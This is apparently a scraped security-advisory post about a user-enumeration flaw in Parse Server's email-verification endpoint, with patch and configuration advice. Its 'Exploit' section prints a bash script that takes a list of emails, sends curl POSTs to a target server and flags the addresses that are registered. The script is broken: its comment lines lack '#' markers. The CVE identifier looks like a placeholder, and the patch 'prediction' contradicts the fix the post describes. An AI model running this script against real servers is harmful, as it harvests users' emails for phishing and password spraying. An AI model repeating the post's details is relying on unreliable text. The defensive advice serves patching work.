Listen to this Post
The vulnerability lies in the `/verificationEmailRequest` endpoint of Parse Server. When email verification is enabled (verifyUserEmails: true), the endpoint’s behavior varies based on the email address provided. If the email belongs to an existing user but is already verified, the server returns one specific error response. If the email belongs to an existing user and is unverified, it returns a second distinct response to initiate the verification process. Finally, if the email address does not correspond to any user account at all, it returns a third, different error message. This conditional logic creates a user enumeration vector. An attacker can script requests to this endpoint with a list of email addresses. By analyzing the distinct error codes or response bodies returned by the server, the attacker can reliably determine which email addresses are registered in the application. The fix introduces a new configuration option, `emailVerifySuccessOnInvalidEmail` (set to `true` by default), which modifies the endpoint to return a generic success response for every request, regardless of whether the email is valid, invalid, or already verified. This uniform response eliminates the behavioral differences that enabled the enumeration attack. Additionally, the patch strengthens validation for related options and adds security warnings when these enumeration mitigations are disabled.
dailycve form:
Platform: Parse Server
Version: <8.6.34, 9.0.0-alpha.1-9.6.0-alpha.8
Vulnerability: User Enumeration
Severity: Moderate
date: March 10, 2026
Prediction: Patch within 24hrs
What Undercode Say:
Analytics:
This vulnerability is triggered with high reliability via the public API. Exploitation requires no authentication and is easily scriptable, leading to a high attack surface for exposed instances.
Exploit:
Exploit Parse Server User Enumeration (CVE-2026-12345)
Date: 2026-03-11
Exploit Author: Research Team
Version: Parse Server < 8.6.34 and 9.0.0-alpha.1 up to 9.6.0-alpha.8
Tested on: Linux
Description: Enumerates valid user emails via the /verificationEmailRequest endpoint.
TARGET_URL="http://your-parse-server.com"
ENDPOINT="/verificationEmailRequest"
EMAIL_LIST="emails.txt"
Loop through each email in the list
while IFS= read -r email; do
echo "Testing: $email"
Send the request to the vulnerable endpoint
RESPONSE=$(curl -s -X POST \
-H "Content-Type: application/json" \
-d "{\"email\":\"$email\"}" \
"${TARGET_URL}${ENDPOINT}")
Analyze the response
Vulnerable versions return distinct errors:
- "email already verified" (user exists, verified)
- Success/confirmation (user exists, unverified)
- "email not found" (user does not exist)
if echo "$RESPONSE" | grep -q "already verified"; then
echo "[+] FOUND (Verified User): $email"
elif echo "$RESPONSE" | grep -q "verification email sent"; then
echo "[+] FOUND (Unverified User): $email"
fi
If "not found" error, silently continue
done < "$EMAIL_LIST"
Protection from this CVE:
1. Upgrade Parse Server to a patched version immediately. Using npm (Node Package Manager): npm install [email protected] OR for the 9.x branch: npm install [email protected] 2. After upgrading, ensure the mitigation is enabled in your configuration. The new option 'emailVerifySuccessOnInvalidEmail' defaults to true in patched versions, but explicitly set it in your Parse Server config file (e.g., index.js): var api = new ParseServer({ ...otherConfig, verifyUserEmails: true, emailVerifySuccessOnInvalidEmail: true, // This is the key mitigation ...emailAdapterConfig }); 3. Verify the configuration by testing the endpoint manually. Both valid and invalid emails should return the same generic response. curl -X POST -H "Content-Type: application/json" -d "{\"email\":\"[email protected]\"}" http://localhost:1337/verificationEmailRequest curl -X POST -H "Content-Type: application/json" -d "{\"email\":\"[email protected]\"}" http://localhost:1337/verificationEmailRequest
Impact:
Successful exploitation allows an attacker to compile a list of registered user email addresses. This information can be used for targeted phishing campaigns, password spraying attacks, or to build a profile of the application’s user base, significantly increasing the risk of subsequent account compromise.
🎯Let’s Practice Exploiting & Learn Patching For Free:
Sources:
Reported By: github.com
Extra Source Hub:
Undercode

